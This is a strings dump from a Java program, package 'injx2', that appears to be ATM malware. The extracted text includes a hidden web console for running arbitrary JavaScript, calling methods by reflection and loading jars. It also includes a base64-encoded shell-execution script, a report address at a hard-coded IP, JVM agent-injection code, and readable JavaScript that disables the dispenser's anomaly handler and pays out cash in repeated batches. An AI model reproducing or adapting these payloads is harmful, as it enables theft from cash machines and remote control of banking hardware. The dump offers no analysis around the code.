java/util/logging/Logger 000000006503 000000006503 0 getLogger 00000000650F 00000000650F 0 .(Ljava/lang/String;)Ljava/util/logging/Logger; 000000006541 000000006541 0 java/util/logging/Level 00000000655B 00000000655B 0 SEVERE 000000006564 000000006564 0 Ljava/util/logging/Level; 000000006585 000000006585 0 C(Ljava/util/logging/Level;Ljava/lang/String;Ljava/lang/Throwable;)V 0000000065CB 0000000065CB 0 loadClass 0000000065D7 0000000065D7 0 %(Ljava/lang/String;)Ljava/lang/Class; 000000006600 000000006600 0 newInstance 00000000660E 00000000660E 0 ()Ljava/lang/Object; 000000006625 000000006625 0 getMethods 000000006632 000000006632 0 ()[Ljava/lang/reflect/Method; 000000006652 000000006652 0 java/lang/reflect/Method 00000000666D 00000000666D 0 equals 000000006676 000000006676 0 (Ljava/lang/Object;)Z 00000000668E 00000000668E 0 getParameterTypes 0000000066A2 0000000066A2 0 ()[Ljava/lang/Class; 0000000066B9 0000000066B9 0 invoke 0000000066C1 0000000066C1 0 9(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object; File pos Mem pos ID Text ======== ======= == ==== 0000000066FE 0000000066FE 0 java/util/Map 000000006713 000000006713 0 8(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object; 00000000674F 00000000674F 0 printStackTrace 000000006761 000000006761 0 (Ljava/lang/String;)V 000000006779 000000006779 0 isDirectory 00000000678D 00000000678D 0 append 000000006795 000000006795 0 -(Ljava/lang/String;)Ljava/lang/StringBuilder; 0000000067C6 0000000067C6 0 toString 0000000067D1 0000000067D1 0 getProperty 0000000067DE 0000000067DE 0 &(Ljava/lang/String;)Ljava/lang/String; 000000006808 000000006808 0 toLowerCase 000000006816 000000006816 0 indexOf 000000006820 000000006820 0 (Ljava/lang/String;)I 000000006838 000000006838 0 getenv 000000006847 000000006847 0 Ljava/io/PrintStream; 00000000685F 00000000685F 0 (Ljava/io/OutputStream;)V 00000000687B 00000000687B 0 (Ljava/io/Writer;)V 000000006891 000000006891 0 java/util/Collections 0000000068A9 0000000068A9 0 synchronizedMap 0000000068BA 0000000068BA 0 (Ljava/util/Map;)Ljava/util/Map; 000000007103 000000007103 0 injx2/HTTPServ$MyHandler$dispen.class 0000000071FA 0000000071FA 0 Ljava/lang/String; 000000007214 000000007214 0 this$0 00000000721F 00000000721F 0 MyHandler 00000000722C 00000000722C 0 InnerClasses 00000000723B 00000000723B 0 Linjx2/HTTPServ$MyHandler; 000000007258 000000007258 0 <init> 000000007260 000000007260 0 A(Linjx2/HTTPServ$MyHandler;Ljava/lang/String;Ljava/lang/String;)V 0000000072AC 0000000072AC 0 LineNumberTable 0000000072BE 0000000072BE 0 LocalVariableTable 0000000072DA 0000000072DA 0 dispen 0000000072E2 0000000072E2 0 !Linjx2/HTTPServ$MyHandler$dispen; 000000007318 000000007318 0 result 000000007321 000000007321 0 rawData 000000007336 000000007336 0 Ljava/net/URL; 00000000734E 00000000734E 0 Ljava/net/HttpURLConnection; 000000007372 000000007372 0 Ljava/io/OutputStream; 000000007391 000000007391 0 Ljava/lang/Exception; 0000000073AE 0000000073AE 0 StackMapTable 0000000073C7 0000000073C7 0 SourceFile 0000000073D4 0000000073D4 0 HTTPServ.java 0000000073FD 0000000073FD 0 %%list_dispense%% 000000007426 000000007426 0 java/lang/StringBuilder 00000000747A 00000000747A 0 !application/x-www-form-urlencoded 00000000749F 00000000749F 0 java/net/URL 0000000074BD 0000000074BD 0 java/net/HttpURLConnection 0000000074EB 0000000074EB 0 Content-Type 0000000074FF 0000000074FF 0 Content-Length 000000007531 000000007531 0 java/lang/Exception 000000007547 000000007547 0 ERRSRV 000000007551 000000007551 0 injx2/HTTPServ$MyHandler$dispen 000000007573 000000007573 0 java/lang/Thread 000000007589 000000007589 0 injx2/HTTPServ$MyHandler 0000000075AA 0000000075AA 0 java/lang/String 0000000075BD 0000000075BD 0 replaceAll 0000000075C9 0000000075C9 0 8(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String; 000000007605 000000007605 0 runjs 00000000760C 00000000760C 0 &(Ljava/lang/String;)Ljava/lang/String; 000000007636 000000007636 0 injx2/Global 00000000764C 00000000764C 0 Ljava/io/BufferedWriter; File pos Mem pos ID Text ======== ======= == ==== 000000007667 000000007667 0 append 00000000766F 00000000766F 0 -(Ljava/lang/String;)Ljava/lang/StringBuilder; 0000000076A0 0000000076A0 0 toString 0000000076AB 0000000076AB 0 ()Ljava/lang/String; 0000000076C2 0000000076C2 0 java/io/BufferedWriter 0000000076DB 0000000076DB 0 write 0000000076E3 0000000076E3 0 (Ljava/lang/String;)V 0000000076FB 0000000076FB 0 flush 000000007703 000000007703 0 getBytes 000000007714 000000007714 0 javax/xml/bind/DatatypeConverter 000000007738 000000007738 0 printBase64Binary 00000000774C 00000000774C 0 ([B)Ljava/lang/String; 000000007765 000000007765 0 java/net/URLEncoder 00000000777B 00000000777B 0 encode 000000007783 000000007783 0 urlreport 000000007790 000000007790 0 openConnection 0000000077A1 0000000077A1 0 ()Ljava/net/URLConnection; 0000000077BE 0000000077BE 0 setDoOutput 0000000077D3 0000000077D3 0 setRequestMethod 0000000077E6 0000000077E6 0 setRequestProperty 0000000077FA 0000000077FA 0 '(Ljava/lang/String;Ljava/lang/String;)V 000000007825 000000007825 0 length 000000007834 000000007834 0 valueOf 00000000783E 00000000783E 0 (I)Ljava/lang/String; 000000007856 000000007856 0 connect 000000007860 000000007860 0 getOutputStream 000000007872 000000007872 0 ()Ljava/io/OutputStream; 00000000788D 00000000788D 0 java/io/OutputStream 0000000078A4 0000000078A4 0 ([B)V 0000000078AC 0000000078AC 0 getInputStream 0000000078BD 0000000078BD 0 ()Ljava/io/InputStream; 0000000078D7 0000000078D7 0 injx2/HTTPServ 000000007B9D 000000007B9D 0 injx2/HTTPServ$MyHandler.class 000000007E82 000000007E82 0 MyHandler 000000007E8F 000000007E8F 0 InnerClasses 000000007E9E 000000007E9E 0 dispen 000000007EA6 000000007EA6 0 urlreport 000000007EB3 000000007EB3 0 Ljava/lang/String; 000000007EC8 000000007EC8 0 jscmd 000000007EDD 000000007EDD 0 <init> 000000007EF3 000000007EF3 0 LineNumberTable 000000007F05 000000007F05 0 LocalVariableTable 000000007F21 000000007F21 0 Linjx2/HTTPServ$MyHandler; 000000007F3E 000000007F3E 0 runjs 000000007F45 000000007F45 0 &(Ljava/lang/String;)Ljava/lang/String; 000000007F73 000000007F73 0 Ljavax/script/ScriptException; 000000007F94 000000007F94 0 script 000000007F9D 000000007F9D 0 manager 000000007FA6 000000007FA6 0 "Ljavax/script/ScriptEngineManager; 000000007FCC 000000007FCC 0 engine 000000007FD5 000000007FD5 0 Ljavax/script/ScriptEngine; 000000007FF8 000000007FF8 0 Ljava/io/StringWriter; 000000008016 000000008016 0 Ljava/io/PrintWriter; 000000008035 000000008035 0 StackMapTable 000000008057 000000008057 0 handle 00000000805F 00000000805F 0 ((Lcom/sun/net/httpserver/HttpExchange;)V 00000000809A 00000000809A 0 Ljava/io/InputStream; 0000000080B2 0000000080B2 0 reader 0000000080BB 0000000080BB 0 Ljava/io/BufferedReader; 0000000080DC 0000000080DC 0 Ljava/lang/StringBuilder; File pos Mem pos ID Text ======== ======= == ==== 00000000810A 00000000810A 0 Ljava/util/regex/Pattern; 00000000812A 00000000812A 0 Ljava/util/regex/Matcher; 00000000815D 00000000815D 0 [Ljava/lang/Class; 000000008182 000000008182 0 [Ljava/lang/reflect/Method; 0000000081A4 0000000081A4 0 Ljava/lang/Class; 0000000081BD 0000000081BD 0 [Ljava/lang/String; 0000000081D3 0000000081D3 0 lstatus 0000000081E7 0000000081E7 0 Ljava/lang/Object; 000000008201 000000008201 0 Ljava/lang/Exception; 00000000821F 00000000821F 0 [Ljava/lang/Object; 000000008235 000000008235 0 match 000000008244 000000008244 0 param 00000000824C 00000000824C 0 entry 000000008259 000000008259 0 Ljava/util/Iterator; 000000008270 000000008270 0 jfile 00000000827D 00000000827D 0 ptype 000000008285 000000008285 0 mname 0000000082A6 0000000082A6 0 Linjx2/ViewClassLoader; 0000000082CE 0000000082CE 0 function 0000000082D9 0000000082D9 0 xjscmd 0000000082F7 0000000082F7 0 %Lcom/sun/net/httpserver/HttpExchange; 000000008320 000000008320 0 response 00000000832B 00000000832B 0 method 000000008334 000000008334 0 out_cmd 000000008343 000000008343 0 Ljava/io/OutputStream; 00000000835C 00000000835C 0 LocalVariableTypeTable 000000008375 000000008375 0 [Ljava/lang/Class<*>; 0000000083BD 0000000083BD 0 Exceptions 0000000083CD 0000000083CD 0 <clinit> 0000000083D8 0000000083D8 0 SourceFile 0000000083E5 0000000083E5 0 HTTPServ.java 0000000083F9 0000000083F9 0 javax/script/ScriptEngineManager 00000000841D 00000000841D 0 injx2/HTTPServ 000000008442 000000008442 0 java/io/StringWriter 000000008459 000000008459 0 java/io/PrintWriter 00000000848E 00000000848E 0 javax/script/ScriptException 0000000084CC 0000000084CC 0 java/lang/StringBuilder 000000008511 000000008511 0 java/io/BufferedReader 00000000852A 00000000852A 0 java/io/InputStreamReader 00000000857B 00000000857B 0 &]+)=([ 0000000085B8 0000000085B8 0 Got query 0000000085CF 0000000085CF 0 Dispensing 0000000085DD 0000000085DD 0 injx2/HTTPServ$MyHandler$dispen 000000008636 000000008636 0 I<form action="/eva" method="POST"><textarea rows="15" cols="40" name="j"> 000000008683 000000008683 0 </textarea><br /><input type="submit" value="Run"></form><textarea rows="15" cols="40" readonly> 0000000086E6 0000000086E6 0 </textarea> 000000008716 000000008716 0 java/lang/Class 000000008734 000000008734 0 </h1><br /> 000000008754 000000008754 0 <a href="/mgr? 000000008781 000000008781 0 )</a><br /> 000000008795 000000008795 0 java/lang/String 0000000087B6 0000000087B6 0 !<form method="post" action="/mgr? 0000000087DA 0000000087DA 0 "><table> 0000000087E7 0000000087E7 0 <tr><td><b> 0000000087F4 0000000087F4 0 6</b></td><td><input type="text" name="ps" /></td></tr> 00000000882D 00000000882D 0 ;</table><br /><input type="submit" value="Invoke" /></form> 00000000886C 00000000886C 0 java/lang/Object 000000008896 000000008896 0 <b>Preparing...</b><br /> 0000000088B7 0000000088B7 0 <b>Unprotecting...</b><br /> 0000000088DB 0000000088DB 0 <b>Invoking...</b><br /> File pos Mem pos ID Text ======== ======= == ==== 0000000088FB 0000000088FB 0 <b>Return: </b> 00000000890D 00000000890D 0 java/lang/Exception 000000008923 000000008923 0 <h1>Entries: </h1><br /> 000000008958 000000008958 0 </a><br /> 000000008965 000000008965 0 /core 00000000898A 00000000898A 0 injx2/ViewClassLoader 0000000089B1 0000000089B1 0 <form action="/core" method="post"><table><tr><td> 0000000089E4 0000000089E4 0 <b>Jar: </b></td><td><input type="text" name="0"></td></tr> 000000008A20 000000008A20 0 <tr><td><b>Class: </b></td><td><input type="text" name="1"></td></tr><tr><td><b>Method: </b></td><td><input type="text" name="2"></td></tr><tr><td><b>Args: </b></td><td><input type="text" name="3"></td></tr><tr><td><input type="radio" name="4" vale="a"><b> Autostart</b></td><td><input type="radio" name="4" vale="h" checked><b> Handler</b></td></tr><tr><td></td><td><input type="submit" value="Go"></td></tr></table> 000000008BC2 000000008BC2 0 </form> 000000008BCC 000000008BCC 0 This is POST 000000008C07 000000008C07 0 os.name 000000008C29 000000008C29 0 cKJd.exe 000000008C3D 000000008C3D 0 %%shell%% 000000008C4A 000000008C4A 0 %%arg%% 000000008C54 000000008C54 0 %%cmdb64%% 000000008C6B 000000008C6B 0 Content-Type 000000008C79 000000008C79 0 text/html 000000008CAA 000000008CAA 0 http://150.100.246.18:60000 000000008CCD 000000008CCD 0 dmFyIEJ1ZmZlcmVkUmVhZGVyPVBhY2thZ2VzLmphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJqYXZhLmlvLkJ1ZmZlcmVkUmVhZGVyIik7CnZhciBSZWFkZXI9UGFja2FnZXMuamF2YS5sYW5nLkNsYXNzLmZvck5hbWUoImphdmEuaW8uUmVhZGVyIik7CnZhciBJbnB1dFN0cmVhbT1QYWNrYWdlcy5qYXZhLmxhbmcuQ2xhc3MuZm9yTmFtZSgiamF2YS5pby5JbnB1dFN0cmVhbSIpOwp2YXIgcD1QYWNrYWdlcy5qYXZhLmxhbmcuUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhbIiUlc2hlbGwlJSIsIiUlYXJnJSUiLGphdmEubGFuZy5TdHJpbmcoUGFja2FnZXMuamF2YXgueG1sLmJpbmQuRGF0YXR5cGVDb252ZXJ0ZXIucGFyc2VCYXNlNjRCaW5hcnkoIiUlY21kYjY0JSUiKSldKTsKdmFyIGJ1Zj1qYXZhLmlvLkJ1ZmZlcmVkUmVhZGVyKGphdmEuaW8uSW5wdXRTdHJlYW1SZWFkZXIocC5nZXRJbnB1dFN0cmVhbSgpKSk7CndoaWxlKDEpewoJdmFyIGxpbmU9YnVmLnJlYWRMaW5lKCk7CglpZihsaW5lIT1udWxsKXsKCQlwcmludChsaW5lKyJcbiIpOwoJfSBlbHNlIHsKCQlicmVhazsKCX0KfQoKCg== 000000008FC0 000000008FC0 0 var tGlobal=Packages.java.lang.Class.forName("injx2.Global"); 000000008FFE 000000008FFE 0 var Global=tGlobal.cast(tGlobal.newInstance()); 00000000902E 00000000902E 0 var tPeripheral=Global.runningclass.get("Peripheral"); 000000009065 000000009065 0 var Peripheral=tPeripheral.cast(tPeripheral.newInstance()); 0000000090A1 0000000090A1 0 var jsd=Peripheral.Dispenser;if(!jsd.isOk()){print("DERROR");} else {var resume=""; 0000000090F5 0000000090F5 0 for (var j = 0; j < jsd.getNumberOfCashUnits(); j++) { 00000000912C 00000000912C 0 resume+=jsd.getCashUnit(j).getValue()+":"+jsd.getCashUnit(j).getActual()+";"; 00000000917D 00000000917D 0 print(resume+"\n");} 000000009194 000000009194 0 var tGlobal=Packages.java.lang.Class.forName("injx2.Global"); 0000000091D2 0000000091D2 0 var Global=tGlobal.cast(tGlobal.newInstance()); 000000009202 000000009202 0 var tPeripheral=Global.runningclass.get("Peripheral"); 000000009239 000000009239 0 var Peripheral=tPeripheral.cast(tPeripheral.newInstance()); 000000009275 000000009275 0 var jsd=Peripheral.Dispenser; 000000009293 000000009293 0 jsd.clearDispenseValues(); 0000000092AE 0000000092AE 0 jsd.removeAnomalyHandler("Dispenser"); 0000000092D5 0000000092D5 0 var todispen=[%%list_dispense%%]; 0000000092F7 0000000092F7 0 var cassette=[]; 000000009308 000000009308 0 var resume=""; 000000009317 000000009317 0 for (var j = 0; j < jsd.getNumberOfCashUnits(); j++) { 00000000934E 00000000934E 0 resume+=jsd.getCashUnit(j).getValue()+":"+jsd.getCashUnit(j).getActual()+";"; 00000000939D 00000000939D 0 if(parseInt(jsd.getCashUnit(j).getValue())<=0 || j>=todispen.length){ 0000000093E4 0000000093E4 0 continue; 0000000093F3 0000000093F3 0 if(todispen[j]>=jsd.getCashUnit(j).getActual()-100){ 000000009429 000000009429 0 todispen[j]=jsd.getCashUnit(j).getActual()-100; 00000000945E 00000000945E 0 cassette.push({denom: jsd.getCashUnit(j).getValue(), id: j}); 00000000949F 00000000949F 0 print(resume+"\n"); 0000000094B3 0000000094B3 0 cassette=cassette.sort(function(a, b){return a.denom - b.denom}); 0000000094F5 0000000094F5 0 for(var ci=cassette.length-1;ci>=0;ci--){ 00000000951F 00000000951F 0 if(todispen[cassette[ci]['id']]>0){ 000000009544 000000009544 0 var roundx=Math.ceil(todispen[cassette[ci]['id']]/40); 00000000957D 00000000957D 0 for(var k=0; k<roundx;k++){ 00000000959B 00000000959B 0 jsd.clearDispenseValues(); 0000000095B9 0000000095B9 0 var amount=todispen[cassette[ci]['id']]; 0000000095E5 0000000095E5 0 if(amount>40){ 0000000095F7 0000000095F7 0 amount=40; 00000000960B 00000000960B 0 todispen[cassette[ci]['id']]-=amount; 000000009634 000000009634 0 jsd.getCashUnit(ci).setDispense(amount); 000000009660 000000009660 0 print(cassette[ci]['id']+":"+cassette[ci]['denom']+":"+amount+"\n"); 0000000096A8 0000000096A8 0 var x = jsd.dispense(); 0000000096C3 0000000096C3 0 if(!x){ print("ERROR:"+jsd.getCommandStatusString()+"\n");break;} File pos Mem pos ID Text ======== ======= == ==== 000000009708 000000009708 0 var y = jsd.present(); 000000009722 000000009722 0 var z = jsd.waitForBillsTaken(30); 000000009751 000000009751 0 jsd.setAnomalyHandler("Dispenser"); 00000000977C 00000000977C 0 injx2/HTTPServ$MyHandler 000000009796 000000009796 0 "com/sun/net/httpserver/HttpHandler 0000000097BC 0000000097BC 0 javax/script/ScriptEngine 0000000097D7 0000000097D7 0 #com/sun/net/httpserver/HttpExchange 0000000097FE 0000000097FE 0 java/io/InputStream 000000009814 000000009814 0 java/util/regex/Pattern 00000000982E 00000000982E 0 java/util/regex/Matcher 000000009848 000000009848 0 java/util/Iterator 00000000985D 00000000985D 0 java/io/IOException 000000009873 000000009873 0 getClassLoader 000000009884 000000009884 0 ()Ljava/lang/ClassLoader; 0000000098A0 0000000098A0 0 (Ljava/lang/ClassLoader;)V 0000000098BD 0000000098BD 0 getEngineByExtension 0000000098D3 0000000098D3 0 /(Ljava/lang/String;)Ljavax/script/ScriptEngine; 000000009906 000000009906 0 (Ljava/io/Writer;)V 00000000991C 00000000991C 0 getContext 000000009929 000000009929 0 ()Ljavax/script/ScriptContext; 00000000994A 00000000994A 0 javax/script/ScriptContext 000000009966 000000009966 0 setWriter 000000009973 000000009973 0 setErrorWriter 00000000998A 00000000998A 0 &(Ljava/lang/String;)Ljava/lang/Object; 0000000099B4 0000000099B4 0 printStackTrace 0000000099C6 0000000099C6 0 (Ljava/io/PrintWriter;)V 0000000099E0 0000000099E0 0 getBuffer 0000000099ED 0000000099ED 0 ()Ljava/lang/StringBuffer; 000000009A0A 000000009A0A 0 java/lang/StringBuffer 000000009A23 000000009A23 0 toString 000000009A2E 000000009A2E 0 ()Ljava/lang/String; 000000009A45 000000009A45 0 getRequestMethod 000000009A58 000000009A58 0 getRequestURI 000000009A68 000000009A68 0 ()Ljava/net/URI; 000000009A7B 000000009A7B 0 java/net/URI 000000009A8A 000000009A8A 0 getPath 000000009A94 000000009A94 0 equals 000000009A9D 000000009A9D 0 (Ljava/lang/Object;)Z 000000009AB5 000000009AB5 0 injx2/Global 000000009AC4 000000009AC4 0 checklog 000000009ACF 000000009ACF 0 getRequestBody 000000009AE0 000000009AE0 0 ()Ljava/io/InputStream; 000000009AFA 000000009AFA 0 (Ljava/io/InputStream;)V 000000009B15 000000009B15 0 (Ljava/io/Reader;)V 000000009B2B 000000009B2B 0 readLine 000000009B36 000000009B36 0 append 000000009B3E 000000009B3E 0 -(Ljava/lang/String;)Ljava/lang/StringBuilder; 000000009B6F 000000009B6F 0 java/net/URLDecoder 000000009B85 000000009B85 0 decode 000000009B95 000000009B95 0 Ljava/io/BufferedWriter; 000000009BB0 000000009BB0 0 java/io/BufferedWriter 000000009BC9 000000009BC9 0 write 000000009BD1 000000009BD1 0 (Ljava/lang/String;)V 000000009BE9 000000009BE9 0 flush 000000009BF1 000000009BF1 0 compile 000000009BFA 000000009BFA 0 -(Ljava/lang/String;)Ljava/util/regex/Pattern; 000000009C2B 000000009C2B 0 matcher 000000009C34 000000009C34 0 3(Ljava/lang/CharSequence;)Ljava/util/regex/Matcher; 000000009C78 000000009C78 0 group 000000009C80 000000009C80 0 (I)Ljava/lang/String; File pos Mem pos ID Text ======== ======= == ==== 000000009C98 000000009C98 0 replaceAll 000000009CA4 000000009CA4 0 8(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String; 000000009CDF 000000009CDF 0 A(Linjx2/HTTPServ$MyHandler;Ljava/lang/String;Ljava/lang/String;)V 000000009D24 000000009D24 0 start 000000009D2C 000000009D2C 0 getQuery 000000009D37 000000009D37 0 split 000000009D3E 000000009D3E 0 '(Ljava/lang/String;)[Ljava/lang/String; 000000009D69 000000009D69 0 runningclass 000000009D78 000000009D78 0 Ljava/util/Map; 000000009D8A 000000009D8A 0 java/util/Map 000000009D9F 000000009D9F 0 &(Ljava/lang/Object;)Ljava/lang/Object; 000000009DC9 000000009DC9 0 getDeclaredMethods 000000009DDE 000000009DDE 0 ()[Ljava/lang/reflect/Method; 000000009DFE 000000009DFE 0 java/lang/reflect/Method 000000009E19 000000009E19 0 getParameterTypes 000000009E2D 000000009E2D 0 ()[Ljava/lang/Class; 000000009E44 000000009E44 0 getName 000000009E4E 000000009E4E 0 getBytes 000000009E5F 000000009E5F 0 javax/xml/bind/DatatypeConverter 000000009E83 000000009E83 0 printBase64Binary 000000009E97 000000009E97 0 ([B)Ljava/lang/String; 000000009EB0 000000009EB0 0 parseBase64Binary 000000009EC4 000000009EC4 0 (Ljava/lang/String;)[B 000000009EDD 000000009EDD 0 ([B)V 000000009EE4 000000009EE4 0 -(Ljava/lang/Object;)Ljava/lang/StringBuilder; 000000009F15 000000009F15 0 java/lang/Integer 000000009F29 000000009F29 0 parseInt 000000009F34 000000009F34 0 (Ljava/lang/String;)I 000000009F4C 000000009F4C 0 isArray 000000009F5D 000000009F5D 0 isAccessible 000000009F6C 000000009F6C 0 setAccessible 000000009F83 000000009F83 0 invoke 000000009F8B 000000009F8B 0 9(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object; 000000009FC8 000000009FC8 0 keySet 000000009FD1 000000009FD1 0 ()Ljava/util/Set; 000000009FE5 000000009FE5 0 java/util/Set 000000009FF5 000000009FF5 0 iterator 00000000A000 00000000A000 0 ()Ljava/util/Iterator; 00000000A019 00000000A019 0 hasNext 00000000A02A 00000000A02A 0 ()Ljava/lang/Object; 00000000A040 00000000A040 0 insertjar 00000000A04C 00000000A04C 0 loadClass 00000000A058 00000000A058 0 %(Ljava/lang/String;)Ljava/lang/Class; 00000000A081 00000000A081 0 newInstance 00000000A08F 00000000A08F 0 getMethods 00000000A09B 00000000A09B 0 substring 00000000A0A8 00000000A0A8 0 (II)Ljava/lang/String; 00000000A0C1 00000000A0C1 0 java/lang/System 00000000A0D4 00000000A0D4 0 getProperty 00000000A0E2 00000000A0E2 0 toLowerCase 00000000A0F0 00000000A0F0 0 contains 00000000A0FB 00000000A0FB 0 (Ljava/lang/CharSequence;)Z 00000000A119 00000000A119 0 getResponseHeaders 00000000A12D 00000000A12D 0 "()Lcom/sun/net/httpserver/Headers; 00000000A153 00000000A153 0 com/sun/net/httpserver/Headers 00000000A179 00000000A179 0 '(Ljava/lang/String;Ljava/lang/String;)V 00000000A1A4 00000000A1A4 0 length 00000000A1B3 00000000A1B3 0 sendResponseHeaders 00000000A1C9 00000000A1C9 0 (IJ)V 00000000A1D1 00000000A1D1 0 getResponseBody File pos Mem pos ID Text ======== ======= == ==== 00000000A1E3 00000000A1E3 0 ()Ljava/io/OutputStream; 00000000A1FE 00000000A1FE 0 java/io/OutputStream 00000000A215 00000000A215 0 close 00000000B710 00000000B710 0 injx2/HTTPServ.class 00000000B771 00000000B771 0 MyHandler 00000000B77E 00000000B77E 0 InnerClasses 00000000B78D 00000000B78D 0 <init> 00000000B7A3 00000000B7A3 0 LineNumberTable 00000000B7B5 00000000B7B5 0 LocalVariableTable 00000000B7D1 00000000B7D1 0 Linjx2/HTTPServ; 00000000B7F0 00000000B7F0 0 value 00000000B7FC 00000000B7FC 0 server 00000000B804 00000000B804 0 #Lcom/sun/net/httpserver/HttpServer; 00000000B82B 00000000B82B 0 Exceptions 00000000B83B 00000000B83B 0 SourceFile 00000000B848 00000000B848 0 HTTPServ.java 00000000B85D 00000000B85D 0 java/net/InetSocketAddress 00000000B898 00000000B898 0 injx2/HTTPServ$MyHandler 00000000B8CA 00000000B8CA 0 injx2/HTTPServ 00000000B8DB 00000000B8DB 0 java/lang/Object 00000000B8EE 00000000B8EE 0 java/io/IOException 00000000B904 00000000B904 0 java/lang/Integer 00000000B918 00000000B918 0 valueOf 00000000B922 00000000B922 0 (I)Ljava/lang/Integer; 00000000B93B 00000000B93B 0 intValue 00000000B94B 00000000B94B 0 !com/sun/net/httpserver/HttpServer 00000000B970 00000000B970 0 create 00000000B978 00000000B978 0 B(Ljava/net/InetSocketAddress;I)Lcom/sun/net/httpserver/HttpServer; 00000000B9BE 00000000B9BE 0 createContext 00000000B9CD 00000000B9CD 0 \(Ljava/lang/String;Lcom/sun/net/httpserver/HttpHandler;)Lcom/sun/net/httpserver/HttpContext; 00000000BA2D 00000000BA2D 0 java/util/concurrent/Executors 00000000BA4E 00000000BA4E 0 newCachedThreadPool 00000000BA63 00000000BA63 0 (()Ljava/util/concurrent/ExecutorService; 00000000BA8F 00000000BA8F 0 setExecutor 00000000BA9C 00000000BA9C 0 "(Ljava/util/concurrent/Executor;)V 00000000BAC2 00000000BAC2 0 start 00000000BBD5 00000000BBD5 0 injx2/INJX.class 00000000BDC0 00000000BDC0 0 Ljava/io/File; 00000000BDD1 00000000BDD1 0 <init> 00000000BDE7 00000000BDE7 0 LineNumberTable 00000000BDF9 00000000BDF9 0 LocalVariableTable 00000000BE15 00000000BE15 0 Linjx2/INJX; 00000000BE24 00000000BE24 0 getProcessNameFromPID 00000000BE3B 00000000BE3B 0 &(Ljava/lang/String;)Ljava/lang/String; 00000000BE69 00000000BE69 0 Ljava/io/IOException; 00000000BE85 00000000BE85 0 Ljava/lang/InterruptedException; 00000000BEAD 00000000BEAD 0 Ljava/lang/Process; 00000000BEC3 00000000BEC3 0 sbInput 00000000BECD 00000000BECD 0 Ljava/lang/StringBuffer; 00000000BEE8 00000000BEE8 0 brInput 00000000BEF2 00000000BEF2 0 Ljava/io/BufferedReader; 00000000BF14 00000000BF14 0 Ljava/lang/String; 00000000BF28 00000000BF28 0 foundLine 00000000BF35 00000000BF35 0 result 00000000BF43 00000000BF43 0 Ljava/io/FileNotFoundException; 00000000BF71 00000000BF71 0 Ljava/lang/StringBuilder; 00000000BF93 00000000BF93 0 StackMapTable 00000000BFBE 00000000BFBE 0 getpid 00000000BFCD 00000000BFCD 0 runtime 00000000BFD6 00000000BFD6 0 $Ljava/lang/management/RuntimeMXBean; File pos Mem pos ID Text ======== ======= == ==== 00000000C004 00000000C004 0 Ljava/lang/reflect/Field; 00000000C027 00000000C027 0 Lsun/management/VMManagement; 00000000C047 00000000C047 0 pid_method 00000000C054 00000000C054 0 Ljava/lang/reflect/Method; 00000000C070 00000000C070 0 Ljava/lang/NoSuchFieldException; 00000000C094 00000000C094 0 Ljava/lang/SecurityException; 00000000C0B3 00000000C0B3 0 $Ljava/lang/IllegalArgumentException; 00000000C0DA 00000000C0DA 0 "Ljava/lang/IllegalAccessException; 00000000C0FF 00000000C0FF 0 !Ljava/lang/NoSuchMethodException; 00000000C123 00000000C123 0 -Ljava/lang/reflect/InvocationTargetException; 00000000C16D 00000000C16D 0 ([Ljava/lang/String;)V 00000000C186 00000000C186 0 descriptor 00000000C192 00000000C192 0 /Lcom/sun/tools/attach/VirtualMachineDescriptor; 00000000C1CA 00000000C1CA 0 Ljava/util/Iterator; 00000000C1E1 00000000C1E1 0 descriptors 00000000C1EF 00000000C1EF 0 Ljava/util/List; 00000000C201 00000000C201 0 2Lcom/sun/tools/attach/AttachNotSupportedException; 00000000C236 00000000C236 0 )Lcom/sun/tools/attach/AgentLoadException; 00000000C262 00000000C262 0 3Lcom/sun/tools/attach/AgentInitializationException; 00000000C299 00000000C299 0 Ljava/net/URISyntaxException; 00000000C2BD 00000000C2BD 0 %Lcom/sun/tools/attach/VirtualMachine; 00000000C2ED 00000000C2ED 0 [Ljava/lang/String; 00000000C303 00000000C303 0 LocalVariableTypeTable 00000000C31B 00000000C31B 0 ALjava/util/List<Lcom/sun/tools/attach/VirtualMachineDescriptor;>; 00000000C385 00000000C385 0 SourceFile 00000000C391 00000000C391 0 INJX.java 00000000C3A8 00000000C3A8 0 os.name 00000000C3D5 00000000C3D5 0 tasklist 00000000C3E5 00000000C3E5 0 java/io/IOException 00000000C400 00000000C400 0 java/lang/StringBuffer 00000000C419 00000000C419 0 java/io/BufferedReader 00000000C432 00000000C432 0 java/io/InputStreamReader 00000000C460 00000000C460 0 UNKNOWN 00000000C46F 00000000C46F 0 java/lang/StringBuilder 00000000C49C 00000000C49C 0 injx2/INJX 00000000C4C8 00000000C4C8 0 java/lang/InterruptedException 00000000C4FC 00000000C4FC 0 java/io/File 00000000C50B 00000000C50B 0 /proc/ 00000000C514 00000000C514 0 /psline 00000000C528 00000000C528 0 /cmdline 00000000C533 00000000C533 0 java/io/FileReader 00000000C54D 00000000C54D 0 java/io/FileNotFoundException 00000000C577 00000000C577 0 Known 00000000C59E 00000000C59E 0 sun/management/VMManagement 00000000C5BC 00000000C5BC 0 getProcessId 00000000C5CB 00000000C5CB 0 java/lang/Class 00000000C5E5 00000000C5E5 0 java/lang/Object 00000000C5FD 00000000C5FD 0 java/lang/Integer 00000000C616 00000000C616 0 java/lang/NoSuchFieldException 00000000C637 00000000C637 0 java/lang/SecurityException 00000000C654 00000000C654 0 "java/lang/IllegalArgumentException 00000000C679 00000000C679 0 java/lang/IllegalAccessException 00000000C69D 00000000C69D 0 java/lang/NoSuchMethodException 00000000C6BE 00000000C6BE 0 +java/lang/reflect/InvocationTargetException 00000000C6F9 00000000C6F9 0 +----------------- JVMs:------------------- 00000000C744 00000000C744 0 -com/sun/tools/attach/VirtualMachineDescriptor 00000000C78F 00000000C78F 0 *----------------------------------------- 00000000C7CE 00000000C7CE 0 0com/sun/tools/attach/AttachNotSupportedException 00000000C812 00000000C812 0 Loading: 00000000C86F 00000000C86F 0 Liberdade e gl File pos Mem pos ID Text ======== ======= == ==== 00000000C883 00000000C883 0 Libertad y gloria 00000000C8C9 00000000C8C9 0 'com/sun/tools/attach/AgentLoadException 00000000C8F3 00000000C8F3 0 1com/sun/tools/attach/AgentInitializationException 00000000C928 00000000C928 0 